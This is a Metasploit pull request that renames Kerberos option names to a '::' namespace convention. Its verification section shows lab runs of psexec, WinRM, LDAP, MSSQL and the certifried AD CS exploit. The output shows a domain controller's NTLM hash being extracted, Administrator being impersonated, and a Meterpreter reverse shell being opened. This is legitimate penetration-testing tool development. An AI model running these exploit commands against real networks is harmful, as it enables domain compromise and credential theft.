### PR TITLE
Change kerberos option name namespacing convention to ::

### PR DESCRIPTION
**Pull request by adfoster-r7**
A pull request to update the naming convention of the Kerberos options that we're adding.

Before:

```
#{protocol}#{option_name}

WinrmAuth
MssqlKrb5Ccname
```

After:

```
#{protocol}#{option_name}

Winrm::Auth
Mssql::Krb5Ccname
```

## Verification

Verify the modules work as expected and that there are no traces to the old datastore names, i.e. in code/in docs etc

I searched old references with:

```
rg -i '(smbauth|winrmauth|ldapauth|mssqlauth|smbrhostname|winrmrhostname|ldaprhostname|mssqlrhostname|Krb5Ccname)' .
```

WinRM

```
use scanner/winrm/winrm_login

# old
run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrmauth=kerberos domaincontrollerrhost=192.168.123.13 winrmrhostname=dc3.adf3.local domain=adf3.local

# new - explicit namespace
run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrm::auth=kerberos domaincontrollerrhost=192.168.123.13 winrm::rhostname=dc3.adf3.local domain=adf3.local
```

```
use windows/winrm/winrm_script_exec

# old
run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrmauth=kerberos domaincontrollerrhost=192.168.123.13 winrmrhostname=dc3.adf3.local domain=adf3.local

# new - explicit namespace
run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrm::auth=kerberos domaincontrollerrhost=192.168.123.13 winrm::rhostname=dc3.adf3.local domain=adf3.local
```

ldap

```
use gather/ldap_query

# old
run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldapauth=kerberos ldaprhostname=dc3.adf3.local domain=adf3.local domaincontrollerrhost=192.168.123.13

# new - explicit namespace
run rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldap::auth=kerberos domaincontrollerrhost=192.168.123.13 ldap::rhostname=dc3.adf3.local domain=adf3.local
```

psexec

```
use windows/smb/psexec

# old
run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smbauth=kerberos domaincontrollerrhost=192.168.123.13 smbrhostname=dc3.adf3.local domain=adf3.local

# new - explicit namespace
run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.adf3.local domain=adf3.local
```

mssql:

```
msf6 auxiliary(admin/mssql/mssql_sql) > run 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd1234 mssql::auth=kerberos mssql::rhostname=dc3.adf3.local mssqldomain=adf3.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
[*] Running module against 192.168.123.13

[+] 192.168.123.13:1433 - 192.168.123.13:88 - Received a valid TGT-Response
[*] 192.168.123.13:1433 - 192.168.123.13:1433 - TGT MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20230126141057_default_192.168.123.13_mit.kerberos.cca_148209.bin
[+] 192.168.123.13:1433 - 192.168.123.13:88 - Received a valid TGS-Response
[*] 192.168.123.13:1433 - 192.168.123.13:1433 - TGS MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20230126141057_default_192.168.123.13_mit.kerberos.cca_359734.bin
[+] 192.168.123.13:1433 - 192.168.123.13:88 - Received a valid delegation TGS-Response
[*] 192.168.123.13:1433 - SQL Query: select auth_scheme from sys.dm_exec_connections where session_id=@@spid
[*] 192.168.123.13:1433 - Row Count: 1 (Status: 16 Command: 193)



 auth_scheme
 -----------
 KERBEROS
```

Verify certifried works:

```
# nuke klist
klist -d

# Certifried module
msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd ca=adf3-DC3-CA dc_name=dc3 domain=adf3.local
[*] Running module against 192.168.123.13

[+] 192.168.123.13:445 - Successfully authenticated to LDAP (192.168.123.13:636)
[+] 192.168.123.13:445 - Successfully created adf3.local\DESKTOP-V9QCC1ZM$
[+] 192.168.123.13:445 -   Password: wjEortAqdIczf5OTPvCLhnHJJulXhesI
[+] 192.168.123.13:445 -   SID:      S-1-5-21-1266190811-2419310613-1856291569-2603
[+] 192.168.123.13:445 - Successfully authenticated to LDAP (192.168.123.13:636)
[*] 192.168.123.13:445 - Attempting to set the DNS hostname for the computer DESKTOP-V9QCC1ZM$ to the DNS hostname for the DC: dc3
[+] 192.168.123.13:445 - Successfully changed the DNS hostname
[+] 192.168.123.13:445 - The requested certificate was issued.
[*] 192.168.123.13:445 - Certificate stored at: /Users/adfoster/.msf4/loot/20230126140540_default_192.168.123.13_windows.ad.cs_554203.pfx
[*] 192.168.123.13:445 - Attempting PKINIT login for dc3$@adf3.local
[+] 192.168.123.13:445 - Successfully authenticated with certificate
[*] 192.168.123.13:445 - 192.168.123.13:445 - TGT MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20230126140540_default_192.168.123.13_mit.kerberos.cca_655835.bin
[*] 192.168.123.13:445 - Trying to retrieve NT hash for dc3$
[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGS-Response
[*] 192.168.123.13:445 - 192.168.123.13:445 - TGS MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20230126140540_default_192.168.123.13_mit.kerberos.cca_892052.bin
[+] 192.168.123.13:445 - Found NTLM hash for dc3$: aad3b435b51404eeaad3b435b51404ee:4ce792d17eb72305c03234b5439c9365
[*] 192.168.123.13:445 - Getting TGS impersonating Administrator@adf3.local (SPN: cifs/dc3.adf3.local)
[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGS-Response
[*] 192.168.123.13:445 - 192.168.123.13:445 - TGS MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20230126140540_default_192.168.123.13_mit.kerberos.cca_537570.bin
[*] 192.168.123.13:445 - Deleting the computer account DESKTOP-V9QCC1ZM$
[*] 192.168.123.13:445 - 192.168.123.13:88 - Using cached credential for cifs/dc3.adf3.local@ADF3.LOCAL Administrator@ADF3.LOCAL
[+] 192.168.123.13:445 - The specified computer has been deleted.
[*] Auxiliary module execution completed

# Verify it worked - and the cache is used
msf6 exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.adf3.local domain=adf3.local
[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 192.168.123.13:445 - Connecting to the server...
[*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|adf3.local as user 'Administrator'...
[*] 192.168.123.13:445 - 192.168.123.13:88 - Using cached credential for cifs/dc3.adf3.local@ADF3.LOCAL Administrator@ADF3.LOCAL
[*] 192.168.123.13:445 - Selecting PowerShell target
[*] 192.168.123.13:445 - Executing the payload...
[+] 192.168.123.13:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 192.168.123.13
[*] Meterpreter session 7 opened (192.168.123.1:4444 -> 192.168.123.13:58110) at 2023-01-26 14:06:48 +0000

meterpreter > exit

```

### CODE REVIEW

**Comment by adfoster-r7** [comment]
As a paper trail, I sync'd up with @smcintyre-r7 @cdelafuente-r7 and @jmartin-r7 - and I think we were all impartial on the overall decision - with a slightly bias in favor of the `smb::` prefix.

File: lib/msf/core/exploit/remote/kerberos/ticket/storage.rb [hunk 1]
```diff
@@ -15,9 +15,9 @@ def initialize(info = {})
       super
     end
 
-    # @param [String,nil] protocol The service protocol type, i.e. smb/ldap/winrm/mssql
+    # @param [String] protocol The service protocol type, i.e. smb/ldap/winrm/mssql
     # @return [Array<Msf::OptEnum>]
-    def kerberos_storage_options(protocol: nil)
```
Comment (dwelch-r7) [inline lib/msf/core/exploit/remote/kerberos/ticket/storage.rb:20]: if the protocol can be nil won't the option name come out as `::Auth`

Comment (adfoster-r7) [reply lib/msf/core/exploit/remote/kerberos/ticket/storage.rb:20]: Protocol is required, this is the old code

Comment (dwelch-r7) [reply lib/msf/core/exploit/remote/kerberos/ticket/storage.rb:20]: so it is 😓

**Pull request merged**